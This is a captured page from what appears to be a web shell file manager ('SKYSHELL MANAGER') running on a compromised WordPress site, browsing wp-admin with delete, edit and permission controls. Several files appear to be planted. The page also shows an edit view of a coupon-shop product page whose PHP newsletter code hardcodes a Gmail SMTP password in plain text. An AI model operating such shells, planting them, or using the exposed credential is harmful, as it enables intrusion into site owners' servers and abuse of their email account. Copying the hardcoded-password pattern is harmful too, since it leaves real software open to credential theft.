📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: fairy.php
<!DOCTYPE html> <html> <head> <link rel="shortcut icon" href="images/fav.png" /> <title>Fairy Antibacterial - Triumph Coupons</title> <link href="css/bootstrap.css" rel="stylesheet" type="text/css" media="all" /> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="js/jquery.min.js"></script> <!-- Custom Theme files --> <!--theme-style--> <link href="css/style.css" rel="stylesheet" type="text/css" media="all" /> <!--//theme-style--> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="keywords" content="Retail coupon deals, coupns, coupon deals,Retail things" /> <script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script> <!--fonts--> <link href='http://fonts.googleapis.com/css?family=Lato:100,300,400,700,900' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Vollkorn:400,700' rel='stylesheet' type='text/css'> <!--//fonts--> <script type="text/javascript" src="js/move-top.js"></script> <script type="text/javascript" src="js/easing.js"></script> <script type="text/javascript"> jQuery(document).ready(function($) { $(".scroll").click(function(event){ event.preventDefault(); $('html,body').animate({scrollTop:$(this.hash).offset().top},1000); }); }); </script> </head> <body> <!--header--> <div class="header"> <div class="container"> <!----> <div class="logo"> <a href="index.php"><img src="images/log1.png" alt="" style="width:75%;margin-top:-4%"></a> </div> <div class="header-right"> <div class="header-bottom"> <div class="top-nav"> <span class="menu"> </span> <ul> <li><a href="index.php">HOME</a> </li> <li><a href="about.php" > ABOUT US</a></li> <li class="active"><a href="product.php" > PRODUCTS</a></li> <li><a href="contact.php" > CONTACT US </a></li> <li><a href="subscribe.php">SUBSCRIBE </a></li> </ul> <!--script--> <script> $("span.menu").click(function(){ $(".top-nav ul").slideToggle(500, function(){ }); }); </script> </div> <a href="#" class="cart">(+1) 718392325</a> <div class="clearfix"> </div> </div> </div> <div class="clearfix"> </div> </div> </div> <!----> <!----> <div class="content"> <div class="container"> <!--- <div class="content-nestle" style="margin-top:3%;height:400px;"> <div> <h2 style="text-align:center;padding-top:15%;color:#FF1573;font-size:45px; text-shadow: 2px 2px yellow;">Products</h2> </div> <div class="clearfix"> </div> </div> <!----> <div class="content-bottom" style="margin-top:5%"> <nav class="breadcrumbs-container" aria-label="Breadcrumbs"> <a href="index.php"><b>Home</b></a> <span class="breadcrumbs-delimiter" aria-hidden="true"> <svg aria-hidden="true" focusable="false" role="presentation" xmlns="http://www.w3.org/2000/svg" width="8" height="5" viewBox="0 0 8 5"> <path fill="currentColor" fill-rule="evenodd" d="M1.002.27L.29.982l3.712 3.712L7.714.982 7.002.27l-3 3z"></path> </svg> </span> <a href="house-hold.php" title=""><b>House Hold Supplies</b></a> <span class="breadcrumbs-delimiter" aria-hidden="true"> <svg aria-hidden="true" focusable="false" role="presentation" xmlns="http://www.w3.org/2000/svg" width="8" height="5" viewBox="0 0 8 5"> <path fill="currentColor" fill-rule="evenodd" d="M1.002.27L.29.982l3.712 3.712L7.714.982 7.002.27l-3 3z"></path> </svg> </span> <span>Fairy Antibacterial Washing Up Liquid Eucalyptus, 383ml </span> </nav><br> <div class="prod-det"> <div class="prod-left" style="width:45%"> <img src="images/house-hold/fairy.jpg" title="" alt""/ style="width:80%"> </div> <div class="prod-right"> <h3>Fairy Antibacterial Washing Up Liquid Eucalyptus, 383ml </h3><br> <h3>$4.909994 USD </h3> <div class="product-description rte" data-product-description=""> <div> <strong>Get Next-day Delivery.<br><br></strong><strong>Buy Fairy Antibacterial Washing Up Liquid Eucalyptus 383ml.</strong><br> </div> <ul style="line-height:35px;"> <li>Antibacterial Washing Up Liquid</li> <li>For Sparkling Clean Dishes & Protects You Sponge For Up To 24 Hours Against Bacterial Growth</li> <li>Efficient cleaning, cleans greasy leftover food completely</li> <li>Ultra Long Lasting Suds from every drop</li> <li>Gentle on your skin, no need to wear rubber gloves</li> <li><strong>Maximum of 1 in a single transaction.</strong></li> </ul> <p><strong>Product Marketing</strong> Good news for you and your sponge. Bad news for germs. Fairy Antibacterial washing up liquid gives you sparkling clean dishes while the Antibacterial Action protects your sponge for up to 24 hours against bacterial growth. So while your plates are gleaming and spotless, your sponge is clean, fresh and protected. All set for the next round of cleaning!</p> <p><strong>Ingredients</strong> 15-30% Anionic Surfactants, 5-15% Non-Ionic Surfactants, Methylisothiazolinone, Phenoxyethanol, Perfumes, Citronellol, Limonene</p> <p><strong>Additional Information</strong> Country of Origin United Kingdom Packed In United Kingdom United Kingdom Pack Type: Bottle</p> <p><strong>Preparation and Usage</strong> Also try Fairy Platinum All in One Dishwasher Tablets for sparkling dishes and a sparkling dishwasher. Fairy Antibacterial washing up liquid is so concentrated that you only need to use a drop.</p> <p><strong>Safety</strong> Causes serious eye irritation. Harmful to aquatic life with long lasting effects. Keep out of reach of children. IF IN EYES: Rinse cautiously with water for several minutes. Remove contact lenses, if present and easy to do. Continue rinsing. If eye irritation persists: Get medical advice/attention. Dispose of contents/container according to local regulations.</p> <p><strong>Manufacturer’s Address</strong> </p> <p><strong>Product Disclaimer</strong> <br>At <b>Triumph Coupons.com</b>, we work to ensure that product information on our website is correct, manufacturers may alter their product information, packaging, ingredients, nutritional guides and allergy advice so you may occasionally see a change or difference in products. Please be aware that <b>Triumph Coupons.com</b> are not the manufacturer of the products sold on our website. Actual product packaging and materials may contain more or other different information than shown on our website. If you have any specific product queries, please contact the manufacturer. We recommend that you always read the label carefully before using or consuming any products including medicinal products. Please do not solely rely on the information provided on our <b>Triumph Coupons.com</b> website and therefore we are unable to accept liability for any inaccuracies or incorrect information contained or presented on our website.</p> </div> </div> <div class="clearfix"> </div> </div> </div> <!----> <div class="grid-top-in" style="margin-top:120px;padding-top:120px;"> <div class="grid-top"> <div class="col-md-4 top-grid "> <h5>ABOUT RETAIL COUPON DEALS.</h5> <p class="sed">"Triumph Coupons" has become the leading online Retail store offering the widest variety of consumer products. Find everything from Retail, household cleaning products, health and beauty supplies, baby products, pet food and much more. Now the speed of online shopping, the convenience of fast delivery and the value of discount mercury can be yours from the comfort of your own home!.</p> </div> <div class="col-md-4 top-grid"> <h5>INFORMATION</h5> <ul class="social-in"> <li><a href="privacy.php">Privacy Policy</a></li> <li><a href="terms.php">Terms and Confditions</a></li> <li><a href="subscribe.php">Subscribe</a></li> <li><a href="unsubscribe.php">Unsubscribe</a></li> </ul> <div class="clearfix"> </div> </div> <div class="col-md-4 top-grid"> <h5>NEWSLETTER:</h5> <p class="nospace btmspace-15" style="margin-bottom:15px;">Subscribe our Newsletter to get latest coupon deals and offers in your inbox.</p> <form method="post" action="#"> <fieldset> <input class="btmspace-15" type="text" name="name" value="" placeholder="Name" style="margin-bottom:15px;"><br> <input class="btmspace-15" type="text" name="email" value="" placeholder="Email" style="margin-bottom:15px;"><br> <div class="send"> <input type="submit" name="Submit" value="Submit" > </div> </fieldset> </form> <?php use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; //require_once __DIR__ . '/vendor/phpmailer/src/Exception.php'; require_once __DIR__ . '/vendor/phpmailer/src/PHPMailer.php'; require_once __DIR__ . '/vendor/phpmailer/src/SMTP.php'; //subscribe form if (isset($_POST['Submit'])){ $name=$_REQUEST['name']; $email=$_REQUEST['email']; $message=$_REQUEST['message']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ $mail = new PHPMailer(true); // Server settings //$mail->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail->isSMTP(); $mail->Host = 'smtp.gmail.com'; $mail->SMTPAuth = true; $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail->Port = 587; $mail->Username = 'contact@triumphcoupons.com'; // YOUR gmail email $mail->Password = 'ppupwzgdzspokdmu'; // YOUR gmail password // Sender and recipient settings $mail->setFrom('contact@triumphcoupons.com', 'Triumph Coupons'); $mail->addAddress($email, $name, $message); $mail->addReplyTo('contact@triumphcoupons.com', 'Triumph Coupons'); // to set the reply to // Setting the email content $mail->IsHTML(true); $mail->Subject = "Subscribe Replay"; $mail->Body = "<h3>Hi,</h3> <p>Thanks for subscribing to our newsletter.</p> <p>We are glad that you joined us...</p><br><br> <p>Regards,<br> <b>Triumph Coupons</b></p>"; //$mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Success! check sometimes later."; } else { echo "Your submission has been submitted successfully."; } $mail2 = new PHPMailer(true); // Server settings //$mail2->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail2->isSMTP(); $mail2->Host = 'smtp.gmail.com'; $mail2->SMTPAuth = true; $mail2->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail2->Port = 587; $mail2->Username = 'contact@triumphcoupons.com'; // YOUR gmail email $mail2->Password = 'ppupwzgdzspokdmu'; // YOUR gmail password // Sender and recipient settings $mail2->setFrom('contact@triumphcoupons.com', 'Triumph Coupons'); $mail2->addAddress('contact@triumphcoupons.com', 'Triumph Coupons'); //$mail->addReplyTo('contact@triumphcoupons.com', 'Triumph Coupons'); // to set the reply to // Setting the email content $mail2->IsHTML(true); $mail2->Subject = "Subscribe Details"; $mail2->Body = "<strong>Following user has been submitted subscribe details on your website <strong><br> Name : $name<br> Email : $email<br> Message : $message<br>"; //$mail->AltBody = "This is the plain text version of the email content"; $mail2->send(); } } ?> </div> <div class="clearfix"> </div> </div> </div> </div> </div> <div class="clearfix"> </div> </div> </div> </div> </div> <!----> <div class="footer"> <div class="container"> <p class="footer-grid">Copyright © 2025. All Rights Reserved.</p> </div> <script type="text/javascript"> $(document).ready(function() { /* var defaults = { containerID: 'toTop', // fading element id containerHoverID: 'toTopHover', // fading element hover id scrollSpeed: 1200, easingType: 'linear' }; */ $().UItoTop({ easingType: 'easeOutQuart' }); }); </script> <a href="#" id="toTop" style="display: block;"> <span id="toTopHover" style="opacity: 1;"> </span></a> </div> </body> </html>>>>>
Save